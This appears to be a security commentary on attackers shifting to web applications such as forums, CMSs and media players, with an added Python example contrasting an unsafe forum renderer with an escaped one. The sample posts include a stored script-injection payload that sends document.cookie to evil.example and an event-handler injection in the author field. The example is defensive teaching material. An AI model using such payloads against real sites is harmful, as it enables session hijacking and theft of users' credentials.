IT and security departments should pay attention to an assessment by security company Finjan that criminals are increasingly targeting Web applications that aren't generally thought of as security risks: chat programs, content-management systems, discussion forums, media players and others, this vnunet.com piece says.
This is a lesser-known element of criminals broadening their sights beyond their traditional haunts, and it makes perfect sense. Web 2.0 applications open the playing field to innovative applications, and many of these rely on letting more data flow in every direction. Every channel that accepts data from the outside is a place where a bug can be reached, and user-supplied input is how it gets reached. In addition, more code, both in absolute terms and as a share of the whole, is not written with security in mind. Short version: the Internet is a free-for-all, and those are perfect conditions for clever crackers.
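What "not securely written" looks like in the kind of application Finjan names (a forum or chat front end that takes text from one user and shows it to everyone else), as an added illustration that is not code from Finjan, vnunet.com or any product mentioned on this page. The forum renderer, the post records and the injected payloads are all constructed for the example; the only real facts it relies on are Python's `html.escape` and `html.parser` behaviour.

```python
"""Stored script injection in a forum post renderer: the unsafe pattern beside
the hardened one, plus a small audit that tells the two apart.

Added example for this page. Everything here is constructed; it does not come
from any vendor or article cited above.
"""
import html
from html.parser import HTMLParser

# Constructed sample posts. The first is benign; the second puts a <script>
# tag in the body; the third attacks the author field, which lands inside an
# HTML attribute rather than a text node.
SAMPLE_POSTS = [
    {"author": "alice",
     "body": "Has anyone tried the new media player plug-in?"},
    {"author": "mallory",
     "body": "Nice! <script>document.location='http://evil.example/?c='"
             "+document.cookie</script>"},
    {"author": 'bob" onmouseover="alert(1)',
     "body": "Look at the author field too."},
]


def render_post_unsafe(post):
    """Concatenates user-controlled fields straight into the markup.

    This is the pattern the article calls 'not securely written': whatever one
    user typed becomes part of the page every other visitor loads, so a
    <script> in the body or an extra attribute in the author name runs in
    their browsers.
    """
    return ('<div class="post" data-author="' + post["author"] + '">'
            '<p>' + post["body"] + '</p></div>')


def render_post_safe(post):
    """Escapes every user-controlled field for the context it lands in.

    html.escape(..., quote=True) rewrites < > & " and ' so the browser treats
    the value as text (in the body) or as a single attribute value (for the
    author), never as new tags or new attributes.
    """
    author = html.escape(post["author"], quote=True)
    body = html.escape(post["body"], quote=True)
    return f'<div class="post" data-author="{author}"><p>{body}</p></div>'


class _TemplateAuditor(HTMLParser):
    """Records any tag or event-handler attribute the template never emits."""

    ALLOWED_TAGS = ("div", "p")

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag not in self.ALLOWED_TAGS:
            self.findings.append(f"unexpected tag <{tag}>")
        for name, _value in attrs:
            if name.lower().startswith("on"):
                self.findings.append(f"event handler attribute {name} on <{tag}>")


def audit(rendered_html):
    """Parses rendered markup the way a browser would and returns a list of
    tags and handler attributes that the template itself does not produce.
    An empty list means user input stayed inert."""
    auditor = _TemplateAuditor()
    auditor.feed(rendered_html)
    auditor.close()
    return auditor.findings


def render_thread(posts, renderer):
    """Renders a whole thread with the given renderer (unsafe or safe)."""
    return "\n".join(renderer(p) for p in posts)


if __name__ == "__main__":
    for label, renderer in (("unsafe", render_post_unsafe), ("safe", render_post_safe)):
        page = render_thread(SAMPLE_POSTS, renderer)
        print(f"[{label}] findings: {audit(page)}")
```

The audit is deliberately narrow: it only knows which tags and attributes this one template is allowed to produce, which is exactly the knowledge a reviewer of a real forum or CMS template has and a generic signature feed does not.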
The story says companies generally keep patches on Microsoft software up to date but don't think twice about many other programs. The truism about cyber criminals is that they follow the money and attack where resistance is lowest, which makes attacks on these applications almost inevitable. Additionally, the story says, vulnerability-tracking resources such as BugTraq and @Risk don't follow these applications, so defenders get less warning and the fight against hackers is less efficient.
The broadening array of things that are under attack is well documented in this InfoWorld commentary. The writer says application vulnerabilities are being exploited in Apple QuickTime, Macromedia Flash, YouTube videos, Adobe Acrobat, Microsoft Office and others.
More vulnerabilities of this kind are noted in this vnunet.com piece on Microsoft's most recent "patch Tuesday." One of the bugs labeled "critical" affects DirectShow, which the story describes as a "common interface for media across various programming languages." It includes DirectX plug-ins for video playback, is distributed in Microsoft's Platform SDK and, the story says, is used in Windows Media Player.
Late last month, the SANS Institute said it was set to name its top 20 risks of the past year. In that release, it noted that criminals are shifting their focus. In the past, they attacked the most commonly used software. This year, the focus has shifted in two directions: criminals are concentrating on phishing and its variants, and on attacking client-side applications. (The list of top 20 attacks, with links to explanations of each one, is available here.)
The bottom line is that the world of hackers is broadening in parallel with the rise of interactive, more open applications. Security staffs must be aware of the trend and address it, starting with well-designed, securely written code and with patching that covers more than the operating system vendor's products.